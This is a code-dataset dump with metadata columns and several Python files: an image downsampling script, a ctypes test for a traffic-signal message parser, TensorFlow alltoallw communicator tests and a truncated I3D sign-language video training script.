hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
26713231c2d2ad84101b5ee73c2670563252a707
| 3,518
|
py
|
Python
|
IFR/tools/data_downsample.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | 3
|
2022-03-09T13:15:15.000Z
|
2022-03-21T06:59:10.000Z
|
IFR/tools/data_downsample.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | null | null | null |
IFR/tools/data_downsample.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | null | null | null |
import os
import cv2
import glob
def main_seq():
gt_path = './data/cityscapes/leftImg8bit_sequence/train'
save_path = './data/cityscapes/leftImg8bit_sequence_down_2x/train'
subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
for i, subdir in enumerate(subdirs):
subdir = subdir.replace(gt_path + '/', '')
names = sorted(glob.glob(os.path.join(gt_path, subdir, '*.png')))
if not os.path.exists(os.path.join(save_path, subdir)):
os.makedirs(os.path.join(save_path, subdir))
for j, name in enumerate(names):
print('{}/{} {}/{}'.format(i, len(subdirs), j, len(names)))
name = name.replace(os.path.join(gt_path, subdir) + '/', '')
gt = cv2.imread(os.path.join(gt_path, subdir, name))
gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(os.path.join(save_path, subdir, name), gt)
gt_path = './data/cityscapes/leftImg8bit_sequence/val'
save_path = './data/cityscapes/leftImg8bit_sequence_down_2x/val'
subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
for i, subdir in enumerate(subdirs):
subdir = subdir.replace(gt_path + '/', '')
names = sorted(glob.glob(os.path.join(gt_path, subdir, '*.png')))
if not os.path.exists(os.path.join(save_path, subdir)):
os.makedirs(os.path.join(save_path, subdir))
for j, name in enumerate(names):
print('{}/{} {}/{}'.format(i, len(subdirs), j, len(names)))
name = name.replace(os.path.join(gt_path, subdir) + '/', '')
gt = cv2.imread(os.path.join(gt_path, subdir, name))
gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(os.path.join(save_path, subdir, name), gt)
def main_gt():
gt_path = './data/cityscapes/gtFine/train'
save_path = './data/cityscapes/gtFine_down_2x/train'
subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
for i, subdir in enumerate(subdirs):
subdir = subdir.replace(gt_path + '/', '')
names = sorted(glob.glob(os.path.join(gt_path, subdir, '*_gtFine_labelTrainIds.png')))
if not os.path.exists(os.path.join(save_path, subdir)):
os.makedirs(os.path.join(save_path, subdir))
for j, name in enumerate(names):
print(i, j)
name = name.replace(os.path.join(gt_path, subdir) + '/', '')
gt = cv2.imread(os.path.join(gt_path, subdir, name), 0)
gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_NEAREST)
cv2.imwrite(os.path.join(save_path, subdir, name), gt)
gt_path = './data/cityscapes/gtFine/val'
save_path = './data/cityscapes/gtFine_down_2x/val'
subdirs = sorted(glob.glob(os.path.join(gt_path, '*')))
for i, subdir in enumerate(subdirs):
subdir = subdir.replace(gt_path + '/', '')
names = sorted(glob.glob(os.path.join(gt_path, subdir, '*_gtFine_labelTrainIds.png')))
if not os.path.exists(os.path.join(save_path, subdir)):
os.makedirs(os.path.join(save_path, subdir))
for j, name in enumerate(names):
print(i, j)
name = name.replace(os.path.join(gt_path, subdir) + '/', '')
gt = cv2.imread(os.path.join(gt_path, subdir, name), 0)
gt = cv2.resize(gt, (1024, 512), interpolation=cv2.INTER_NEAREST)
cv2.imwrite(os.path.join(save_path, subdir, name), gt)
if __name__ == '__main__':
main_seq()
main_gt()
| 45.688312
| 94
| 0.613701
| 487
| 3,518
| 4.285421
| 0.102669
| 0.091998
| 0.134164
| 0.091998
| 0.967897
| 0.96023
| 0.916148
| 0.889315
| 0.850024
| 0.850024
| 0
| 0.02
| 0.218306
| 3,518
| 76
| 95
| 46.289474
| 0.738909
| 0
| 0
| 0.75
| 0
| 0
| 0.120523
| 0.105742
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.046875
| 0
| 0.078125
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cd08eee775962a3c59e4c3b176c5cab95f07c12d
| 3,034
|
py
|
Python
|
test_c_tscbm.py
|
mcity/Mcity-battelle-spat-parser
|
fafcc8f6b5fa9baf390068d8dbcd9df0351a516f
|
[
"MIT"
] | 5
|
2020-05-06T13:18:35.000Z
|
2022-03-28T20:01:29.000Z
|
test_c_tscbm.py
|
mcity/Mcity-battelle-spat-parser
|
fafcc8f6b5fa9baf390068d8dbcd9df0351a516f
|
[
"MIT"
] | 1
|
2021-12-09T06:52:52.000Z
|
2021-12-09T06:52:52.000Z
|
test_c_tscbm.py
|
mcity/Mcity-battelle-spat-parser
|
fafcc8f6b5fa9baf390068d8dbcd9df0351a516f
|
[
"MIT"
] | 3
|
2021-02-06T00:30:06.000Z
|
2021-12-09T06:55:28.000Z
|
##Run a Shared Library version of the TSCBM parser function.
import ctypes
from ctypes import util
##Attach to our library
lib = ctypes.CDLL('./libtscbm.so')
##Attach to C library so we can free memory when done with it.
libc = ctypes.CDLL(util.find_library('c'))
test = '1100110100010000000000010000000011011100000000101010101000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000001111101000000001101110000000010101010100000000000000000000000000000000000000011000000001101110000000001110110110000000000000000000000000000000000000000000000000000000000000000000001000000000000111111000000001011110000000000001111110000000010111100000000000000000000000000000000000000010100000000001111110000001011010100000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000100100110000000000111111000000101101010000000000000000000000000000000000000001110000000000111111000000001101001000000000000000000000000000000000000000000000000000000000000000000000100000000000001111110000000110100001000000000011111100000001101000010000000000000000000000000000000000001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011011101000000000000000000000000001000100000000011111111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001011101000000000011111011001010000000111100111000000000000000000000000000000000'.encode('utf-8')
test_id = '10'.encode('utf-8')
test_time = '2019-08-12 10:41:55'.encode('utf-8')
##Specify the function parameters and types for our functions.
lib.parseTSCBM.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p]
lib.parseTSCBM.restype = ctypes.c_void_p
libc.free.argtypes = (ctypes.c_void_p,)
## Wrap the call in a function so we can ensure the free is called each time.
def parse_TSCBM(in_hex, in_id, in_date):
_ptr = lib.parseTSCBM(in_hex, in_id, in_date)
result = ctypes.cast(_ptr, ctypes.c_char_p,).value
#print(hex(_ptr))
libc.free(_ptr)
return result
import json
print (parse_TSCBM(test, test_id, test_time).decode('utf-8'))
#test2 = json.loads(parse_TSCBM(test, test_id, test_time).decode('utf-8'))
#import pickle
#print (pickle.dumps(test2))
| 97.870968
| 1,985
| 0.905405
| 188
| 3,034
| 14.441489
| 0.425532
| 0.01547
| 0.020258
| 0.022099
| 0.062615
| 0.052302
| 0.041252
| 0.041252
| 0.027993
| 0.027993
| 0
| 0.685685
| 0.046803
| 3,034
| 31
| 1,986
| 97.870968
| 0.253112
| 0.132828
| 0
| 0
| 0
| 0
| 0.769966
| 0.748949
| 0
| 1
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.176471
| 0
| 0.294118
| 0.058824
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cd2aff6ae46a59a501c5d6e64b13165d366741cc
| 10,515
|
py
|
Python
|
hybridbackend/tensorflow/distribute/communicator_alltoallw_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 38
|
2021-12-01T06:54:36.000Z
|
2022-03-23T11:23:21.000Z
|
hybridbackend/tensorflow/distribute/communicator_alltoallw_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 15
|
2021-12-01T09:15:26.000Z
|
2022-03-28T02:49:21.000Z
|
hybridbackend/tensorflow/distribute/communicator_alltoallw_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 8
|
2021-12-02T01:16:14.000Z
|
2022-01-28T04:51:16.000Z
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Tests for Alltoallw.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
import hybridbackend.tensorflow as hb
import hybridbackend.test as hbtest
import unittest
# pylint: disable=missing-docstring
@unittest.skipUnless(
os.getenv('HYBRIDBACKEND_WITH_CUDA') == 'ON', 'GPU required')
class AlltoallwTest(unittest.TestCase):
def setUp(self): # pylint: disable=invalid-name
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
os.environ['TF_CPP_VMODULE'] = 'nccl_alltoallw=1'
def tearDown(self): # pylint: disable=invalid-name
del os.environ['TF_CPP_VMODULE']
del os.environ['CUDA_VISIBLE_DEVICES']
def test_alltoallw(self):
hb.context.options.update(comm_pubsub_device='')
devices = ['/gpu:0', '/gpu:1']
comm_id = 'alltoallw_test'
server = hb.train.Server({'localhost': ['localhost:0']})
shapes = [[[1023, 4, 16], [526, 4, 16]], [[400, 4, 16], [99, 4, 16]]]
expected = []
actual = []
try:
with tf.Graph().as_default():
for i, d in enumerate(devices):
with tf.device(d):
comm = hb.distribute.Communicator.build(comm_id, devices)
inputs = [
tf.get_variable(
f'input_{i}/from_{j}',
initializer=tf.random_normal(
shapes[i][j], mean=100, stddev=80))
for j, _ in enumerate(devices)]
transposed = comm.alltoallw(inputs, common_shape=[4, 16])
actual.append(transposed)
expected.append(inputs)
expected = list(map(list, zip(*expected))) # transpose the inputs.
with server.monitored_session() as sess:
results = sess.run({'actual': actual, 'expected': expected})
for act, exp in zip(results['actual'], results['expected']):
for acti, expi in zip(act, exp):
np.testing.assert_allclose(expi, acti, rtol=1e-6)
finally:
del server
def test_alltoallw_fp16(self):
hb.context.options.update(comm_pubsub_device='')
os.environ['HB_COMM_WIRE_DTYPE_FLOAT'] = 'float16'
devices = ['/gpu:0', '/gpu:1']
comm_id = 'alltoallw_fp16_test'
server = hb.train.Server({'localhost': ['localhost:0']})
shapes = [[[1023, 4, 16], [526, 4, 16]], [[400, 4, 16], [99, 4, 16]]]
expected = []
actual = []
try:
with tf.Graph().as_default():
for i, d in enumerate(devices):
with tf.device(d):
comm = hb.distribute.Communicator.build(
comm_id, devices, impl=hb.distribute.NcclCommunicator)
inputs = [
tf.get_variable(
f'input_{i}/from_{j}',
initializer=tf.random_normal(
shapes[i][j], mean=100, stddev=80))
for j, _ in enumerate(devices)]
transposed = comm.alltoallw(inputs, common_shape=[4, 16])
actual.append(transposed)
expected.append(inputs)
expected = list(map(list, zip(*expected))) # transpose the inputs.
with server.monitored_session() as sess:
results = sess.run({'actual': actual, 'expected': expected})
for act, exp in zip(results['actual'], results['expected']):
for acti, expi in zip(act, exp):
np.testing.assert_allclose(expi, acti, rtol=1e-2)
finally:
del server
del os.environ['HB_COMM_WIRE_DTYPE_FLOAT']
def test_alltoallw_grad(self):
hb.context.options.update(comm_pubsub_device='')
devices = ['/gpu:0', '/gpu:1']
comm_id = 'alltoallw_grad_test'
server = hb.train.Server({'localhost': ['localhost:0']})
values = [[1.0, 2.4], [9.6, 8.8]]
shapes = [[[6, 2, 3], [8, 2, 3]], [[10, 2, 3], [12, 2, 3]]]
lrs = [1.0, 3.0]
grad_ys = [2.0]
all_ys = []
all_inputs = []
try:
with tf.Graph().as_default():
for i, d in enumerate(devices):
with tf.device(d):
comm = hb.distribute.Communicator.build(comm_id, devices)
inputs = [
tf.constant(values[i][j], shape=shapes[i][j])
for j, _ in enumerate(devices)]
all_inputs.append(inputs)
outputs = comm.alltoallw(inputs, common_shape=[2, 3])
all_ys.append(
tf.reduce_sum(tf.concat(outputs, axis=0)) * lrs[i])
with tf.device(devices[0]):
xs = [y for x in all_inputs for y in x]
ys = [tf.add_n(all_ys)]
actual = tf.gradients(
ys, xs, grad_ys, colocate_gradients_with_ops=True)
baseline_all_outputs = list(map(list, zip(*all_inputs)))
baseline_all_ys = [
tf.reduce_sum(
tf.concat(baseline_all_outputs[i], axis=0)) * lrs[i]
for i, _ in enumerate(devices)]
baseline_ys = [tf.add_n(baseline_all_ys)]
expected = tf.gradients(
baseline_ys, xs, grad_ys, colocate_gradients_with_ops=True)
with server.monitored_session() as sess:
results = sess.run({'actual': actual, 'expected': expected})
for act, exp in zip(results['actual'], results['expected']):
for acti, expi in zip(act, exp):
np.testing.assert_allclose(expi, acti, rtol=1e-6)
finally:
del server
def test_alltoallw_grad_fp16(self):
hb.context.options.update(comm_pubsub_device='')
os.environ['HB_COMM_WIRE_DTYPE_FLOAT'] = 'float16'
devices = ['/gpu:0', '/gpu:1']
comm_id = 'alltoallw_grad_fp16_test'
server = hb.train.Server({'localhost': ['localhost:0']})
values = [[1.0, 2.4], [9.6, 8.8]]
shapes = [[[6, 2, 3], [8, 2, 3]], [[10, 2, 3], [12, 2, 3]]]
lrs = [1.0, 3.0]
grad_ys = [2.0]
all_ys = []
all_inputs = []
try:
with tf.Graph().as_default():
for i, d in enumerate(devices):
with tf.device(d):
comm = hb.distribute.Communicator.build(
comm_id, devices, impl=hb.distribute.NcclCommunicator)
inputs = [
tf.constant(values[i][j], shape=shapes[i][j])
for j, _ in enumerate(devices)]
all_inputs.append(inputs)
outputs = comm.alltoallw(inputs, common_shape=[2, 3])
all_ys.append(
tf.reduce_sum(tf.concat(outputs, axis=0)) * lrs[i])
with tf.device(devices[0]):
xs = [y for x in all_inputs for y in x]
ys = [tf.add_n(all_ys)]
actual = tf.gradients(
ys, xs, grad_ys, colocate_gradients_with_ops=True)
baseline_all_outputs = list(map(list, zip(*all_inputs)))
baseline_all_ys = [
tf.reduce_sum(
tf.concat(baseline_all_outputs[i], axis=0)) * lrs[i]
for i, _ in enumerate(devices)]
baseline_ys = [tf.add_n(baseline_all_ys)]
expected = tf.gradients(
baseline_ys, xs, grad_ys, colocate_gradients_with_ops=True)
with server.monitored_session() as sess:
results = sess.run({'actual': actual, 'expected': expected})
for act, exp in zip(results['actual'], results['expected']):
for acti, expi in zip(act, exp):
np.testing.assert_allclose(expi, acti, rtol=1e-2)
finally:
del server
del os.environ['HB_COMM_WIRE_DTYPE_FLOAT']
def test_alltoallw_multi_steps(self):
hb.context.options.update(comm_pubsub_device='')
devices = ['/gpu:0', '/gpu:1']
comm_id = 'alltoallw_multistep_test'
server = hb.train.Server({'localhost': ['localhost:0']})
shapes = [[[10230, 64], [5260, 64]], [[4000, 64], [990, 64]]]
train_ops = []
try:
with tf.Graph().as_default():
for i, d in enumerate(devices):
with tf.device(d):
comm = hb.distribute.Communicator.build(comm_id, devices)
inputs = [
tf.get_variable(
f'input_{i}/from_{j}',
initializer=tf.random_normal(
shapes[i][j], mean=100, stddev=80))
for j, _ in enumerate(devices)]
transposed = comm.alltoallw(inputs, common_shape=[64])
train_op = [
tf.matmul(m, m, transpose_a=True) for m in transposed]
train_ops.append(train_op)
with server.monitored_session() as sess:
for _ in xrange(100):
sess.run(train_ops)
finally:
del server
def test_mutli_alltoallw_multi_steps(self):
hb.context.options.update(comm_pubsub_device='')
devices = ['/gpu:0', '/gpu:1']
comm_id = 'multi_alltoallw_multistep_test'
num_comms = 2
server = hb.train.Server({'localhost': ['localhost:0']})
train_ops = []
try:
with tf.Graph().as_default():
for i, d in enumerate(devices):
with tf.device(d):
for c in xrange(num_comms):
shapes = [
[[1023 + c, 64], [526 + c, 64]],
[[400 + c, 64], [99 + c, 64]]]
inputs = [
tf.get_variable(
f'comm_{c}/input_{i}/from_{j}',
initializer=tf.random_normal(
shapes[i][j], mean=100, stddev=80))
for j, _ in enumerate(devices)]
comm = hb.distribute.Communicator.build(
f'{comm_id}_{c}', devices)
transposed = comm.alltoallw(inputs, common_shape=[64])
train_op = [
tf.matmul(m, m, transpose_a=True) for m in transposed]
train_ops.append(train_op)
with server.monitored_session() as sess:
for _ in xrange(100):
sess.run(train_ops)
finally:
del server
if __name__ == '__main__':
hbtest.main(f'{__file__}.xml')
| 38.800738
| 79
| 0.583738
| 1,356
| 10,515
| 4.35767
| 0.171829
| 0.014216
| 0.042647
| 0.020308
| 0.813843
| 0.777966
| 0.777966
| 0.771535
| 0.771535
| 0.760704
| 0
| 0.031958
| 0.273894
| 10,515
| 270
| 80
| 38.944444
| 0.741978
| 0.081598
| 0
| 0.819742
| 0
| 0
| 0.081404
| 0.023258
| 0
| 0
| 0
| 0
| 0.017167
| 1
| 0.034335
| false
| 0
| 0.042918
| 0
| 0.081545
| 0.004292
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
26ce112c546196aec241fc0e594e224577a0e429
| 177
|
py
|
Python
|
greparl/SearchEngine/__init__.py
|
GeorgeVasiliadis/GreParl
|
10c085c9892ff156aeb13401063c9e0e20d0baff
|
[
"MIT"
] | null | null | null |
greparl/SearchEngine/__init__.py
|
GeorgeVasiliadis/GreParl
|
10c085c9892ff156aeb13401063c9e0e20d0baff
|
[
"MIT"
] | null | null | null |
greparl/SearchEngine/__init__.py
|
GeorgeVasiliadis/GreParl
|
10c085c9892ff156aeb13401063c9e0e20d0baff
|
[
"MIT"
] | null | null | null |
from .backend import Speech
from .backend import SpeechBackend as SearchEngine
from .backend import SpeechFile
from .preprocessing.create import create_inverted_index as index
| 29.5
| 64
| 0.853107
| 23
| 177
| 6.478261
| 0.521739
| 0.221477
| 0.342282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 177
| 5
| 65
| 35.4
| 0.955128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f895a8dda604c7dcd774acbafea8f9329c833141
| 20,478
|
py
|
Python
|
train_i3d.py
|
chenwei850825/sign-language
|
42b0b969dc4f7fd3471686b17b90422abd283edc
|
[
"MIT"
] | null | null | null |
train_i3d.py
|
chenwei850825/sign-language
|
42b0b969dc4f7fd3471686b17b90422abd283edc
|
[
"MIT"
] | null | null | null |
train_i3d.py
|
chenwei850825/sign-language
|
42b0b969dc4f7fd3471686b17b90422abd283edc
|
[
"MIT"
] | null | null | null |
"""
https://github.com/FrederikSchorr/sign-language
Train a pre-trained I3D convolutional network to classify videos
"""
import os
import glob
import time
import sys
import numpy as np
import pandas as pd
import keras
from keras import backend as K
from datagenerator import VideoClasses, FramesGenerator, generate_generator_multiple
from model_i3d import Inception_Inflated3d, add_i3d_top, model_fusion
import tensorflow as tf
from keras.models import Model, load_model
def layers_freeze(keModel:keras.Model) -> keras.Model:
print("Freeze all %d layers in Model %s" % (len(keModel.layers), keModel.name))
for layer in keModel.layers:
layer.trainable = False
return keModel
def layers_unfreeze(keModel:keras.Model) -> keras.Model:
print("Unfreeze all %d layers in Model %s" % (len(keModel.layers), keModel.name))
for layer in keModel.layers:
layer.trainable = True
return keModel
def count_params(keModel:keras.Model):
#trainable_count = int(
#np.sum([K.count_params(p) for p in set(keModel.trainable_weights)]))
#non_trainable_count = int(
#np.sum([K.count_params(p) for p in set(keModel.non_trainable_weights)]))
trainable_count = keras.utils.layer_utils.count_params(keModel.trainable_weights)
non_trainable_count = keras.utils.layer_utils.count_params(keModel.non_trainable_weights)
print('Total params: {:,}'.format(trainable_count + non_trainable_count))
print('Trainable params: {:,}'.format(trainable_count))
print('Non-trainable params: {:,}'.format(non_trainable_count))
return
def train_I3D_oflow_end2end(diVideoSet):
"""
* Loads pretrained I3D model,
* reads optical flow data generated from training videos,
* adjusts top-layers adequately for video data,
* trains only news top-layers,
* then fine-tunes entire neural network,
* saves logs and models to disc.
"""
# directories
sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
#sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
#sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
#sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
#sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
sModelDir = "model_flow_mirror"
diTrainTop = {
"fLearn" : 1e-3,
"nEpochs" : 3}
diTrainAll = {
"fLearn" : 1e-4,
"nEpochs" : 17}
nBatchSize = 1
print("\nStarting I3D end2end training ...")
print(os.getcwd())
# read the ChaLearn classes
#oClasses = VideoClasses(sClassFile)
# Load training data
genFramesTrain = FramesGenerator(sOflowDir + "/train_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 2)
genFramesVal = FramesGenerator(sOflowDir + "/val_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 2)
# Load pretrained i3d model and adjust top layer
print("Load pretrained I3D flow model ...")
keI3DOflow = Inception_Inflated3d(
include_top=False,
weights='flow_imagenet_and_kinetics',
#weights='model/20200704-1221-tsl100-oflow-i3d-entire-best.h5',
input_shape=(diVideoSet["nFramesNorm"], 224, 224, 2))
print("Add top layers with %d output classes ..." % 63)
keI3DOflow = layers_freeze(keI3DOflow)
keI3DOflow = add_i3d_top(keI3DOflow, 63, dropout_prob=0.5)
# Prep logging
sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
"-%s%03d-%03d-oflow-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
# Helper: Save results
csv_logger = tf.keras.callbacks.CSVLogger("log_flow_mirror/" + sLog + "-acc_above.csv", append = True)
# Helper: Save the model
os.makedirs(sModelDir, exist_ok=True)
cpTopLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-last.h5", verbose = 0)
cpTopBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-best.h5",
verbose = 1, save_best_only = True)
cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
verbose = 1, save_best_only = True)
# Fit top layers
print("Fit I3D top layers with generator: %s" % (diTrainTop))
